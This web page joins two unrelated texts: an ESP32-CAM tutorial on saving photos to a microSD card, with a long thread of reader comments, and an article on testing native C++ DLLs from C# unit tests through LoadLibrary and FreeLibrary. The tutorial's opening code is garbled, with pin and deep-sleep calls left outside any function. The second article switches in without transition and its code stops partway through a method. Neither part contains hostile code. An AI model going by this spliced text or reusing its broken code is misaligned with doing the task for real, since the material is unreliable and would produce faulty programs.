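        return CreatedAtAction(nameof(GetCustomerMaster), new { id = customer.CustCd }, customer);
    }

    // PUT: api/CustomerMasters/C001
    [HttpPut("{id}")]
    public async Task<IActionResult> PutCustomerMaster(string id, CustomerMaster customer)
    {
        if (id != customer.CustCd) return BadRequest();
        _context.Entry(customer).State = EntityState.Modified;
        await _context.SaveChangesAsync();
        return NoContent();
    }

    // DELETE: api/CustomerMasters/C001
    [HttpDelete("{id}")]
    public async Task<IActionResult> DeleteCustomerMaster(string id)
    {
        var customer = await _context.CustomerMaster.FindAsync(id);
        if (customer == null) return NotFound();
        _context.CustomerMaster.Remove(customer);
        await _context.SaveChangesAsync();
        return NoContent();
    }
}
```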
Click Add >> New Item >> select Razor Component >> enter your component name. Here we have given the name Customerentry.razor. Note that all component files need the .razor extension.

A Razor component page has three parts of code. First is the import part, where we import all the references and models used in the component; next is the HTML design and data-binding part; and finally we have the functions part, where we call the Web API to bind data in our HTML page and perform client-side business logic for the component page.

Import part

First, we import all the needed support files and references in our Razor page. Here we first import our model class to be used in the view, and also import HttpClient for calling the Web API to perform the CRUD operations.

@page "/customerentry"
@using BlazorCrudA1.Data
@using System.Net.Http
@inject HttpClient Http
@using Microsoft.Extensions.Logging

Register HttpClient for server-side Blazor

In order to use HttpClient in server-side Blazor, we add the code below to the ConfigureServices method of Startup.cs.

services.AddResponseCompression(opts =>
{
    opts.MimeTypes = ResponseCompressionDefaults.MimeTypes.Concat(
        new[] { "application/octet-stream" });
});

// Server-side Blazor doesn't register HttpClient by default
services.AddScoped<HttpClient>(s =>
{
    var uriHelper = s.GetRequiredService<NavigationManager>();
    return new HttpClient { BaseAddress = new Uri(uriHelper.BaseUri) };
});

HTML design and data-binding part

Next, we design our customer master details page to display the customer details from the database. We also create a form to insert and update the customer details, and a Delete button to delete customer records from the database.
For binding in Blazor we use @bind="@custObj.CustCd", and to call a method we use @onclick="@AddNewCustomer".

<h1>ASP.NET Core BLAZOR CRUD demo for Customers</h1>
<hr />
<table width="100%" style="background:#05163D;color:honeydew">
    <tr>
        <td width="20"> </td>
        <td>
            <h2>Add New Customer Details</h2>
        </td>
        <td> </td>
        <td align="right">
            <button class="btn btn-info" @onclick="@AddNewCustomer">Add New Customer</button>
        </td>
        <td width="10"> </td>
    </tr>
    <tr><td colspan="2"></td></tr>
</table>
<hr />
@if (showAddrow == true)
{
    <form>
        <table class="form-group">
            <tr>
                <td><label for="Name" class="control-label">Customer Code</label></td>
                <td><input type="text" class="form-control" @bind="@custObj.CustCd" /></td>
                <td width="20"> </td>
                <td><label for="Name" class="control-label">Customer Name</label></td>
                <td><input type="text" class="form-control" @bind="@custObj.CustName" /></td>
            </tr>
            <tr>
                <td><label for="Email" class="control-label">Email</label></td>
                <td><input type="text" class="form-control" @bind="@custObj.Email" /></td>
                <td width="20"> </td>
                <td><label for="Name" class="control-label">Phone</label></td>
                <td><input type="text" class="form-control" @bind="@custObj.PhoneNo" /></td>
            </tr>
            <tr>
                <td><label for="Name" class="control-label">Insert By</label></td>
                <td><input type="text" class="form-control" @bind="@custObj.InsertBy" /></td>
                <td width="20"> </td>
                <td></td>
                <td><button type="submit" class="btn btn-success" @onclick="@AddCustomer">Save</button></td>
            </tr>
        </table>
    </form>
}
<table width="100%" style="background:#0A2464;color:honeydew">
    <tr>
        <td width="20"> </td>
        <td><h2>Customer List</h2></td>
    </tr>
    <tr><td colspan="2"></td></tr>
</table>
@if (custs == null)
{
    <p><em>Loading...</em></p>
}
else
{
    <table class="table">
        <thead>
            <tr>
                <th>Customer Code</th>
                <th>Customer Name</th>
                <th>Email</th>
                <th>Phone</th>
                <th>Inserted By</th>
            </tr>
        </thead>
        <tbody>
            @foreach (var cust in custs)
            {
                <tr>
                    <td>@cust.CustCd</td>
                    <td>@cust.CustName</td>
                    <td>@cust.Email</td>
                    <td>@cust.PhoneNo</td>
                    <td>@cust.InsertBy</td>
                    <td><button class="btn btn-primary" @onclick="@(() => EditCustomer(cust.CustCd))">Edit</button></td>
                    <td><button class="btn btn-danger" @onclick="@(() => DeleteCustomer(cust.CustCd))">Delete</button></td>
                </tr>
            }
        </tbody>
    </table>
}

Function part

The functions part calls the Web API to bind data in our HTML page and performs client-side business logic for the component page. Here we create separate functions to add, edit, and delete the customer details, calling the Web API GET, POST, PUT, and DELETE methods to perform the CRUD operations; in the HTML we call these functions and bind the results.

@code {
    private CustomerMaster[] custs;
    CustomerMaster custObj = new CustomerMaster();
    string ids = "0";
    bool showAddrow = false;
    bool loadFailed;

    protected override async Task OnInitializedAsync()
    {
        ids = "0";
        custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/");
    }

    void AddNewCustomer()
    {
        ids = "0";
        showAddrow = true;
        custObj = new CustomerMaster();
    }

    // Add new or update existing customer details
    protected async Task AddCustomer()
    {
        if (ids == "0")
        {
            await Http.SendJsonAsync(HttpMethod.Post, "/api/CustomerMasters/", custObj);
        }
        else
        {
            await Http.SendJsonAsync(HttpMethod.Put, "/api/CustomerMasters/" + custObj.CustCd, custObj);
        }
        custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/");
        showAddrow = false;
    }

    // Edit method
    protected async Task EditCustomer(string CustomerID)
    {
        showAddrow = true;
        loadFailed = false;
        ids = CustomerID;
        custObj = await Http.GetJsonAsync<CustomerMaster>("/api/CustomerMasters/" + CustomerID);
    }

    // Delete method
    protected async Task DeleteCustomer(string CustomerID)
    {
        showAddrow = false;
        ids = CustomerID;
        await Http.DeleteAsync("/api/CustomerMasters/" + CustomerID);
        custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/");
    }
}

Navigation menu

Now we need to add the newly added CustomerEntry Razor component to our left navigation. Open the Shared folder, open the NavMenu.razor page, and add the menu item:

<li class="nav-item px-3">
    <NavLink class="nav-link" href="CustomerEntry">
        <span class="oi oi-list-rich" aria-hidden="true"></span> Customer Master
    </NavLink>
</li>

Build and run the application

Note that when creating the DbContext and setting the connection string, don't forget to use your own SQL connection string. Here we created a table in SQL Server and used it with a Web API; you can also do this with services, or with the Code First approach. Hope you all like this article. In the next article, we will see more examples of working with Blazor. It's really cool and awesome to work with Blazor.
https://morioh.com/p/add9bb5f7113
From: Jeremy Siek (jsiek_at_[hidden])
Date: 2001-06-11 14:25:05

On Thu, 7 Jun 2001, David Abrahams wrote:

> There is also this interface:
>
> 3.
> *i ?? // returns a matrix or vector element object.
> value(i) // return the element value
> row(i) // returns the row index
> column(i) // return the column index
> index(i) // return the index (for vectors)

Yes, I like this.

> I very much like the free function interface, but there is always the LWG
> 225/229 issue to be aware of. I am growing more convinced that under the
> current language rules, having an additional tag argument which ties the
> function to a namespace's semantics is the only good answer... but that's
> another topic I guess.

Another option is to just specify that these functions are always in the
boost namespace, and people have to define their overloads in boost.

As for the sparse/dense iterators... between Dave and Andrew's comments it
seems that sticking with a unified interface is the way to go.

Cheers,
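For readers outside the thread, the free-function element interface under discussion can be sketched in a few lines of C++. The struct layout and names below are assumptions for illustration, not Boost or uBLAS code:

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical element iterator for a sparse matrix, illustrating the
// free-function access interface from the thread: value(i) / row(i) / column(i).
struct element_iterator {
    const double* values;        // nonzero values
    const std::size_t* rows;     // row index of each value
    const std::size_t* cols;     // column index of each value
    std::size_t pos;             // current position
};

// Free functions instead of member accessors, as proposed in the post.
inline double value(const element_iterator& i)       { return i.values[i.pos]; }
inline std::size_t row(const element_iterator& i)    { return i.rows[i.pos]; }
inline std::size_t column(const element_iterator& i) { return i.cols[i.pos]; }

// A tiny 2-element sparse matrix: 1.5 at (0,2) and 2.5 at (1,0).
const double sample_values[]      = {1.5, 2.5};
const std::size_t sample_rows[]   = {0, 1};
const std::size_t sample_cols[]   = {2, 0};
const element_iterator sample_it  = {sample_values, sample_rows, sample_cols, 1};
```

Because `value`, `row`, and `column` are free functions, user-defined element types can overload them (the namespace-lookup question the thread is debating) without touching the iterator class itself.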
https://lists.boost.org/Archives/boost/2001/06/13138.php
Opened 5 years ago
Closed 5 years ago

#7299 closed bug (fixed)

threadDelay broken in ghci, Mac OS X

Description

Control.Concurrent.threadDelay fails in ghci on Mac OS X. Behaviour is correct in compiled code. To reproduce, it is enough to just execute threadDelay at the prompt. Depending on the architecture, I get different behaviour:

- i386: 7.6.1 and 7.7.20121003: segmentation fault (11)
- x86_64: 7.6.1 and 7.7.20121003: executes without segfault, but there is no actual delay.

This is on Mac OS X 10.7.5 and 10.8.2. Correct behaviour for ghci-7.6.1-x86_64 on Ubuntu 12.04. Also fine on Mac in the 7.4 series.

Example output:

Nightfall $ ghci
GHCi, version 7.6.1:  :? for help
Loading package ghc-prim ... linking ... done.
Loading package integer-gmp ... linking ... done.
Loading package base ... linking ... done.
Prelude> Foreign.Storable.sizeOf (undefined :: Int)
4
Prelude> Control.Concurrent.threadDelay (1000 * 1000)
Segmentation fault: 11

Sample program for the second case:

import Control.Concurrent

count :: Int -> IO ()
count n
  | n <= 0    = return ()
  | otherwise = do
      putStrLn $ shows n "-ah-ha-ha"
      threadDelay (1000 * 1000) -- 1 second
      count (n-1)

main :: IO ()
main = count 10

Change History (13)

comment:1 Changed 5 years ago by

comment:2 Changed 5 years ago by

comment:3 follow-up: 5 Changed 5 years ago by

What happens if you compile with -threaded? ghci uses the threaded RTS. Compiling with ghc, by default, does not use the threaded RTS. threadDelay follows a much different code path with -threaded than without.

comment:4 Changed 5 years ago by

comment:5 Changed 5 years ago by

> What happens if you compile with -threaded? ghci uses the threaded RTS. Compiling with ghc, by default, does not use the threaded RTS. threadDelay follows a much different code path with -threaded than without.

Works fine compiled with "ghc -threaded", both i386 and x86_64 on 7.6.1.

comment:6 Changed 5 years ago by

I can reproduce this. However, it doesn't happen with a dynamic-by-default build.

comment:7 Changed 5 years ago by

We don't know what is wrong, but Ian speculates that it's a bug in the GHCi linker, since it works with dynamic-by-default. It could also be something to do with the fact that with the GHCi linker we get two copies of the base package but have to do some hacks to make sure that there is only one blob of I/O manager state. Has anyone else come across this threadDelay problem in MacOSX? Can anyone help?

Simon

comment:8 Changed 5 years ago by

I can reproduce this on Snow Leopard with GHC 7.6.1.

comment:9 Changed 5 years ago by

Looks like this is related to us having 2 copies of the base library around. The crash happens sometime around a call to absolute_time in libraries/base/cbits/DarwinUtils.c. This file doesn't exist in 7.4, which explains why it worked then.

comment:10 Changed 5 years ago by

I should mention that I am working on identifying the patch(es) that introduced this problem. The problem is reproducible on my Intel Mac OS X 10.5 (the tn23 builder), sometimes as segmentation faults, but more often as no apparent wait when threadDelay is called via ghci. I am using the tn23 builds as "synchronization points". Using the "repo versions" reported for each build, I have been able, with some adjustments, to reproduce successful builds and, not least, avoid unsuccessful ones. So far, I have been able to narrow the problem down as being introduced between tn23 build 599 () and build 600 (). (Build 599 is a failed build, but it is possible to repair it by applying the changes of patch "da102b36bfee605d4849ab74908886b5270d37ad Fix RTS build on OS X" by hand.) In other words, the adjusted build 599 succeeds and threadDelay seems to work, while build 600 succeeds and threadDelay provides no apparent delay. It is slow going, but I expect to be able to narrow it down further within the next couple of days. In the meantime, the present interval may provide some useful hints.

Best regards
Thorkil

comment:11 Changed 5 years ago by

The state in libraries/base/cbits/DarwinUtils.c would explain why threadDelay would return immediately in GHCi, but I don't see anything that would cause it to crash. In any case, the fix is to move initialize_timer and scaling_factor into the RTS (or maybe just use the existing RTS facilities).

comment:12 Changed 5 years ago by

comment:13 Changed 5 years ago by

Fixed by commit 8a3399d5169af7a82c2c13ca7184fd307f6ea3d8
Author: Ian Lynagh <ian@well-typed.com>
Date: Wed Jan 16 16:35:44 2013 +0000

Looks serious, thanks for the report.
https://ghc.haskell.org/trac/ghc/ticket/7299
With the release of Ansible 2.9, Red Hat will officially be introducing Collections. To quote Red Hat documentation, "Collections are a distribution format for Ansible content. They can be used to package and distribute playbooks, roles, modules, and plugins. You can publish and use collections through Ansible Galaxy." This means that all the NetApp modules and roles will be available in one place. As of Ansible 2.10 this will also be the only way to get modules, as Ansible will no longer include modules in its installation.

We will be releasing a series of collections: one for ONTAP, one for Element SW, and one for SANtricity. There could be other collections in the future containing roles for various solutions. Not only are we ahead of the curve with a collection for ONTAP already available today, but we are one of only five companies that will have certified collections for the 2.9 release. This means that even though the method for how you get, add, and update our modules is changing, the strict standards we adhere to are not.

Getting and using collections is easy. If you are still on 2.8, using the application 'mazer' is the only way to acquire collections. You may not have mazer installed on your Ansible system, so ensure it is there using pip:

#> pip install mazer

Then it's just a matter of requesting the namespace and collection you want. Our namespace is 'netapp' and the first collection is 'ontap':

#> mazer install netapp.ontap

This will install the NetApp ONTAP collection into ~/.ansible/collections/ansible_collections/netapp/ontap/, so you will want to run the mazer install as whatever user will run Ansible, especially if you are using Tower. As a reminder, you will still need the Python module netapp-lib even with collections.

Updating is easy too; you just use the -f option for an update:

#> mazer install netapp.ontap -f

For 2.9 and above, the 'ansible-galaxy' command is used.
#> ansible-galaxy collection install netapp.ontap

This installs to the same location as mazer does: the running user's home directory. If you want to do a more universal installation, you can use the -p flag.

#> ansible-galaxy collection install netapp.ontap -p /usr/share/ansible/collections

This path, /usr/share/ansible/collections, is the other default location where Ansible will look for collections.

As you move to collections you will need to make one change to your playbooks. Since the location of all modules is now moving, you can add the namespace.collection prefix to every task and role you use, like this:

na_ontap_volume -> netapp.ontap.na_ontap_volume

However, that is a lot of updates you might have to make. Instead, you can just add two lines to the top of your playbook to be sure that you are using the collection:

---
- hosts: localhost
  collections:
    - netapp.ontap

Now any roles or modules in that collection can use the standard module and role names you have been using all along.

Go ahead and add the collection to your Ansible environment and let us know what you think. If you have any questions about collections or how NetApp is using them, join us on our Slack channel #configurationmgmt. You can get an invite to the workspace at.
https://netapp.io/2019/09/17/coming-together-nicely/
Deploy MySQL on Oracle's High-Performance Cloud (Step-by-step Guide)

Oracle Cloud Infrastructure (OCI) is Oracle's second-generation cloud infrastructure. These new datacenters were built with the latest high-performance servers (Oracle's X7 servers) and were designed to eliminate network and CPU oversubscription. Due to the high-performance systems and the multiple availability domains (ADs) in each region, these are the preferred environments for deploying MySQL. Since MySQL deploys on Compute services (IaaS), look for "Oracle Cloud Infrastructure Compute" (not Classic) on this region map.

Beyond the benefits of the second-generation datacenters, why deploy MySQL on Oracle's cloud? Here are a few of the reasons people are choosing MySQL on OCI:

- No vendor lock-in: pay minimal or no egress charges and directly access your binary data files. Getting your data out of other clouds can be tedious and expensive.
- Consistency: use the same database on-premise as on-cloud. It's the MySQL Enterprise Edition, the same version available from the website. Use the same monitor for both on-premise and cloud.
- Support: rely on database support from the team that develops MySQL.

As a new platform, extra steps are required to install the MySQL Cloud Service. Otherwise, the install will default to OCI-Classic and you'll miss the benefits of the second-generation datacenters. If you don't have an Oracle Cloud account, get started for free:

LOGGING IN AND SETTING UP YOUR ENVIRONMENT

Sign in to your Cloud Account (cloud.oracle.com) and go to the My Services Dashboard. Click the Navigation menu icon in the top left corner of the My Services Dashboard and then click Compute. This will bring you to the OCI (Oracle Cloud Infrastructure) console.

1. CREATE A COMPARTMENT

Create a compartment called "demo".

- Click Identity. From the left menu, choose Compartments and Create Compartment.
- Name your compartment "Demo".

2. CREATE A NETWORK

Then, create a virtual cloud network with three public subnets, which will span 3 availability domains (ADs). Although it includes a built-in firewall to prevent intrusion, a more secure network should be used for production systems (see VCNs and Subnets).

- Click Networking, Virtual Cloud Networks.
- Click Create Virtual Cloud Network and complete the following fields:
- Create In Compartment: Demo
- IMPORTANT: Select the option Create Virtual Cloud Network plus related resources.
- Click Create Virtual Cloud Network.

3. ENABLE PLATFORM AS A SERVICE (PaaS) ACCESS

This next step enables the MySQL Cloud Service to access the underlying compute and storage resources.

- From the left menu, select the dropdown for the compartment list and select your root compartment.
- From the top menu, click Identity, Policies and Create Policy.
- Name: I chose "MySQLPaaS access".
- Add four policy statements exactly like the following: [note: if you chose a different compartment name than demo, substitute accordingly in the following statements]

Allow service PSM to inspect vcns in compartment demo
Allow service PSM to use subnets in compartment demo
Allow service PSM to use vnics in compartment demo
Allow service PSM to manage security-lists in compartment demo

- Select Create.

4. CREATE A BUCKET FOR OBJECT STORAGE

- Click Storage, Object Storage.
- Switch compartment (bottom left menu) to "Demo".
- Choose Create Bucket.
- Bucket Name: MySQLBackups
- Create Bucket.

Next, create a Swift password to authenticate to the object storage. This will be required when setting up MySQL.

- Click Identity, Users.
- For your user, choose the ellipsis on the right and select View User Details.
- On the left menu, choose "Auth Tokens".
- Generate Token. Important: write down this token. It's unavailable after it's created.
- While you're here, write down the user name for which you've created this token. It should be something like myadminaccount@email.com. You'll need this later.
If you have issues, the above steps are well-documented here. Before continuing to the next step, please write down the following from the current OCI console. You'll need this info for the next steps.

- User name: Choose Identity, Users. This should be the user for whom you generated the authentication token in the previous step.
- Tenancy and region: Noted at the top of the screen.
- Bucket name: Choose Storage, Object Storage. Note the name of the bucket that you created.

5. DEPLOY THE MYSQL CLOUD SERVICE

First, navigate from OCI (Oracle Cloud Infrastructure) to the My Services console. On the very top menu, click My Services. This should bring you back to the My Services Dashboard. To view the MySQL Cloud Service, either click Customer Dashboard or click the navigation menu (three parallel lines) in the upper left corner. Click MySQL and choose Open Service Console and then Create Instance. The following screenshots show appropriate field entries. Once you select "Region", additional fields will display:

Availability Domain: Select AD1
Subnet: This was set up in step 2.

Click Next and complete the Service Details. A full explanation of the fields is available in the online documentation. However, the Backup and Recovery Configuration requires further explanation.
After a few minutes, your MySQL instance will be running. This process has deployed MySQL onto an Oracle Compute instance (similar to EC2 instance) on the next generation datacenter. Once it’s created, identify the public IP address and ssh into the instance. Use ssh opc@xxxxxx to log into the instance. From here, you have full control of your instance. NEXT STEPS Of course, that’s a lot of steps to create a MySQL Cloud Service. Further automation is in development. In future blogs, I’ll include terraform automation instructions. Additionally, with multiple AD’s, we can set up replication for high availability. Thanks for reading. I hope this was helpful.
https://medium.com/@lstigile/deploy-mysql-on-oracles-high-performance-cloud-step-by-step-guide-44d9699511fb?source=rss-b755f531fca1------2
CC-MAIN-2019-04
refinedweb
1,046
57.27
Section (3) mblen Name mblen — determine number of bytes in next multibyte character Synopsis #include <stdlib.h> DESCRIPTION −1. −1. If s is NULL, the mblen() function resets the shift state, known to only this function, to the initial state, and returns nonzero if the encoding has nontrivial shift state, or zero if the encoding is stateless. RETURN VALUE_zsingle_quotesz_t parse a complete multibyte character. ATTRIBUTES For an explanation of the terms used in this section, see attributes(7). NOTES The behavior of mblen() depends on the LC_CTYPE category of the current locale. The function mbrlen(3) provides a better interface to the same functionality.
https://manpages.net/detail.php?name=mblen
CC-MAIN-2022-21
refinedweb
104
56.86
Accessing Attributes in the DOM

Attributes are properties of the element, not children of the element. This distinction is important because of the methods used to navigate sibling, parent, and child nodes of the XML Document Object Model (DOM). For example, the PreviousSibling and NextSibling methods are not used to navigate from an element to an attribute or between attributes. Instead, an attribute is a property of an element and is owned by an element; it has an OwnerElement property rather than a parentNode property, and has distinct methods of navigation.

When the current node is an element, use the HasAttribute method to see if there are any attributes associated with the element. Once it is known that an element has attributes, there are multiple methods for accessing them. To retrieve a single attribute from the element, you can use the GetAttribute and GetAttributeNode methods of the XmlElement, or you can obtain all the attributes into a collection. Obtaining the collection is useful if you need to iterate over it. If you want all attributes from the element, use the Attributes property of the element to retrieve all the attributes into a collection.

If you want all the attributes of an element node put into a collection, call the XmlElement.Attributes property. This gets the XmlAttributeCollection that contains all the attributes of an element. The XmlAttributeCollection class inherits from XmlNamedNodeMap. Therefore, the methods and properties available on the collection include those available on a named node map in addition to methods and properties specific to the XmlAttributeCollection class, such as the ItemOf property or the Append method. Each item in the attribute collection represents an XmlAttribute node. To find the number of attributes on an element, get the XmlAttributeCollection and use the Count property to see how many XmlAttribute nodes are in the collection.
The following code example shows how to retrieve an attribute collection and, using the Count property for the looping index, iterate over it. The code then shows how to retrieve a single attribute from the collection and display its value.

using System;
using System.IO;
using System.Xml;

public class Sample
{
    public static void Main()
    {
        XmlDocument doc = new XmlDocument();
        doc.LoadXml("<book genre='novel' ISBN='1-861001-57-5' misc='sale item'>" +
                    "<title>The Handmaid's Tale</title>" +
                    "<price>14.95</price>" +
                    "</book>");

        // Move to an element.
        XmlElement myElement = doc.DocumentElement;

        // Create an attribute collection from the element.
        XmlAttributeCollection attrColl = myElement.Attributes;

        // Show the collection by iterating over it.
        Console.WriteLine("Display all the attributes in the collection...");
        for (int i = 0; i < attrColl.Count; i++)
        {
            Console.Write("{0} = ", attrColl[i].Name);
            Console.Write("{0}", attrColl[i].Value);
            Console.WriteLine();
        }

        // Retrieve a single attribute from the collection; specifically, the
        // attribute with the name "misc".
        XmlAttribute attr = attrColl["misc"];

        // Retrieve the value from that attribute.
        String miscValue = attr.InnerXml;
        Console.WriteLine("Display the attribute information.");
        Console.WriteLine(miscValue);
    }
}

This example displays the following output:

Display all the attributes in the collection...
genre = novel
ISBN = 1-861001-57-5
misc = sale item
Display the attribute information.
sale item

The information in an attribute collection can be retrieved by name or index number. The example above shows how to retrieve data by name; the next example shows how to retrieve data by index number. Because the XmlAttributeCollection is a collection and can be indexed by name or number, this example selects the first attribute out of the collection using a zero-based index, using the following file, baseuri.xml, as input.

using System;
using System.IO;
using System.Xml;

public class Sample
{
    public static void Main()
    {
        // Create the XmlDocument.
        XmlDocument doc = new XmlDocument();
        doc.Load("");

        // Display information on the attribute node. The value
        // returned for BaseURI is ''.
        XmlAttribute attr = doc.DocumentElement.Attributes[0];
        Console.WriteLine("Name of the attribute: {0}", attr.Name);
        Console.WriteLine("Base URI of the attribute: {0}", attr.BaseURI);
        Console.WriteLine("The value of the attribute: {0}", attr.InnerText);
    }
}

To retrieve a single attribute node from an element, use the XmlElement.GetAttributeNode method. It returns an object of type XmlAttribute. Once you have an XmlAttribute, all the methods and properties of the XmlAttribute class are available on that object, such as finding the OwnerElement.

using System;
using System.IO;
using System.Xml;

public class Sample
{
    public static void Main()
    {
        XmlDocument doc = new XmlDocument();
        doc.LoadXml("<book genre='novel' ISBN='1-861003-78' misc='sale item'>" +
                    "<title>The Handmaid's Tale</title>" +
                    "<price>14.95</price>" +
                    "</book>");

        // Move to an element.
        XmlElement root = doc.DocumentElement;

        // Get an attribute.
        XmlAttribute attr = root.GetAttributeNode("ISBN");

        // Display the value of the attribute.
        String attrValue = attr.InnerXml;
        Console.WriteLine(attrValue);
    }
}

You can also do as shown in the previous example, where a single attribute node is retrieved from the attribute collection. The following code example shows how one line of code can be written to retrieve a single attribute by index number from the root of the XML document tree, also known as the DocumentElement property.
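A minimal sketch of that one-line retrieval, assuming doc holds a loaded XmlDocument (as in the baseuri.xml example above):

```csharp
// One line: index into the root element's attribute collection (zero-based).
XmlAttribute attr = doc.DocumentElement.Attributes[0];
```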
http://msdn.microsoft.com/EN-US/library/hk61a712
CC-MAIN-2014-15
refinedweb
818
51.44
As far as I know, it is legal to include a namespace prefix in template (and param and variable) names as well as template modes, because according to the spec these attributes must be QNames. However, I get an error highlighting when doing something like <xsl:template

Is that a problem of the XSLT plugin or of IDEA?

Regards,
Jens

Jens Voß wrote:
> As far as I know, it is legal to include a namespace prefix in
> template (and param and variable) names as well as template modes [...]

Yes, that was introduced with the latest version of the plugin, which checks the validity of declared identifiers. I'll fix the "Illegal name" highlighting for valid QNames, but the internal support will be limited to names with identical prefixes. I'll put full support for QNames (i.e. resolving by namespace + local name) on my list, but it's currently not a top-priority item. Sorry :(

Sascha
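For illustration (this snippet is not part of the original thread), a stylesheet using prefixed QNames for a template name and mode, which the XSLT spec permits as long as the prefix is declared:

```xml
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:my="urn:example:templates">

  <!-- Both the template name and the mode are QNames with a prefix. -->
  <xsl:template name="my:render" match="item" mode="my:summary">
    <xsl:value-of select="."/>
  </xsl:template>

</xsl:stylesheet>
```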
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206120289-XsltPlugin-Problems-with-qualified-names?page=1
CC-MAIN-2019-22
refinedweb
145
64.85
Old Release
This documentation relates to an old version of DSpace, version 5.x. Looking for another version? See all documentation.

Persistent Identifier
It is good practice to use Persistent Identifiers to address items in a digital repository. There are many different systems for Persistent Identifiers: Handle, DOI, urn:nbn, purl and many more. It is far beyond the scope of this document to discuss the differences between all these systems. For several reasons the Handle System is deeply integrated in DSpace, and DSpace makes intensive use of it. With DSpace 3.0 the Identifier Service was introduced, which makes it possible to also use external identifier services within DSpace.

DOIs are Persistent Identifiers like Handles, but as many big publishing companies use DOIs they are quite well known to scientists. Some journals ask for DOIs to link supplemental material whenever an article is submitted. Beginning with DSpace 4.0 it is possible to use DOIs in parallel to the Handle System within DSpace. By "using DOIs" we mean automatic generation, reservation and registration of DOIs for every item that enters the repository. These newly registered DOIs will not be used as a means to build URLs to DSpace items: items will still rely on Handle assignment for their item URLs.

DOI Registration Agencies
To register a DOI one has to enter into a contract with a DOI registration agency which is a member of the International DOI Foundation. Several such agencies exist, and they have different policies. Some of them offer DOI registration especially or only for academic institutions, others only for publishing companies. Most of the registration agencies charge fees for registering DOIs, and all of them have different rules describing what kind of item a DOI can be registered for. To make it quite clear: to register DOIs with DSpace you have to enter into a contract with a DOI registration agency. 
DataCite is an international initiative to promote science and research, and a member of the International DOI Foundation. The members of DataCite act as registration agencies for DOIs. Some DataCite members provide their own APIs to reserve and register DOIs; others let their clients use the DataCite API directly. Starting with version 4.0, DSpace supports the administration of DOIs by using the DataCite API directly or by using the API from EZID (a service of the University of California Digital Library). This means you can administer DOIs with DSpace if your registration agency allows you to use the DataCite API directly or if your registration agency is EZID.

Configure DSpace to use the DataCite API
If you use a DOI registration agency that lets you use the DataCite API directly, you can follow the instructions below to configure DSpace. In case EZID is your registration agency, the configuration of DSpace is documented here: Configure DSpace to use EZID service for registration of DOIs.

To use DOIs within DSpace you have to configure several parts of DSpace:
- enter your DOI prefix and the credentials to use the API from DataCite in dspace.cfg,
- configure the script which generates some metadata,
- activate the DOI mechanism within DSpace,
- configure a cron job which transmits the information about new and changed DOIs to the registration agency.

dspace.cfg
After you enter into a contract with a DOI registration agency, they'll provide you with user credentials and a DOI prefix. You have to enter these in dspace.cfg. Here is a list of DOI configuration options in dspace.cfg:

Please don't use the test prefix 10.5072 with DSpace. The test prefix 10.5072 differs from other prefixes: it answers GET requests for all DOIs, even for DOIs that are unregistered. DSpace checks that it mints only unused DOIs and will report the error "Register DOI ... failed: DOI_ALREADY_EXISTS". 
Your registration agency can provide you with an individual test prefix that you can use for tests.

Metadata conversion
To reserve or register a DOI, DataCite requires that metadata be supplied which describe the object that the DOI addresses. The file [dspace]/config/crosswalks/DIM2DataCite.xsl controls the conversion of metadata from the DSpace internal format into the DataCite format. You have to add the name of your institution to this file (the attribute values below are reconstructed from context; check them against your copy of the file):

<!--
    Document   : DIM2DataCite.xsl
    Created on : January 23, 2013, 1:26 PM
    Author     : pbecker, ffuerste
    Description: Converts metadata from DSpace Intermediate Format (DIM) into
                 metadata following the DataCite Schema for the Publication
                 and Citation of Research Data, Version 2.2
-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">

    <!-- CONFIGURATION -->
    <!-- The content of the following variable will be used as element publisher. -->
    <xsl:variable name="publisher">My University</xsl:variable>
    <!-- The content of the following variable will be used as element contributor with contributorType datamanager. -->
    <xsl:variable name="datamanager"><xsl:value-of select="$publisher"/></xsl:variable>
    <!-- The content of the following variable will be used as element contributor with contributorType hostingInstitution. -->
    <xsl:variable name="hostinginstitution"><xsl:value-of select="$publisher"/></xsl:variable>
    <!-- Please take a look into the DataCite schema documentation if you want to know how to use these elements. -->

    <!-- DO NOT CHANGE ANYTHING BELOW THIS LINE EXCEPT YOU REALLY KNOW WHAT YOU ARE DOING! -->
...

Just change the value in the variable named "publisher". If you want to know more about the DataCite Schema, have a look at the documentation. If you change this file in a way that is not compatible with the DataCite schema, you won't be able to reserve and register DOIs anymore. Do not change anything if you're not sure what you're doing.

Identifier Service
The Identifier Service manages the generation, reservation and registration of identifiers within DSpace. You can configure it using the config file located in [dspace]/config/spring/api/identifier-service.xml. 
In that file you should already find the code to configure DSpace to register DOIs. Just read the comments and remove the comment signs around the two appropriate beans. After removing the comment signs the file should look something like this (comments removed to keep the listing short; the namespace declarations on the beans element are reconstructed):

<!--
    Copyright (c) 2002-2010, DuraSpace.  All rights reserved
    Licensed under the DuraSpace License.

    A copy of the DuraSpace License has been included in this
    distribution and is available at:
-->
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

    <bean id="org.dspace.identifier.IdentifierService"
          class="org.dspace.identifier.IdentifierServiceImpl"
          autowire="byType"
          scope="singleton"/>

    <bean id="org.dspace.identifier.DOIIdentifierProvider"
          class="org.dspace.identifier.DOIIdentifierProvider"
          scope="singleton">
        <property name="configurationService" ref="org.dspace.services.ConfigurationService"/>
        <property name="DOIConnector" ref="org.dspace.identifier.doi.DOIConnector"/>
    </bean>

    <bean id="org.dspace.identifier.doi.DOIConnector"
          class="org.dspace.identifier.doi.DataCiteConnector"
          scope="singleton">
        <property name='DATACITE_SCHEME' value='https'/>
        <property name='DATACITE_HOST' value='mds.test.datacite.org'/>
        <property name='DATACITE_DOI_PATH' value='/doi/'/>
        <property name='DATACITE_METADATA_PATH' value='/metadata/'/>
        <property name='disseminationCrosswalkName' value="DataCite"/>
    </bean>

</beans>

If you use other IdentifierProviders besides the DOIIdentifierProvider, there will be more beans in this file. Please pay attention to the property DATACITE_HOST: by default it is set to the DataCite test server. To reserve real DOIs you will probably have to change it to mds.datacite.org. Ask your registration agency if you're not sure about the correct address. For some time, unfortunately, the test server and the production server of DataCite had different paths to the API; those paths changed after the release of DSpace 5.4. 
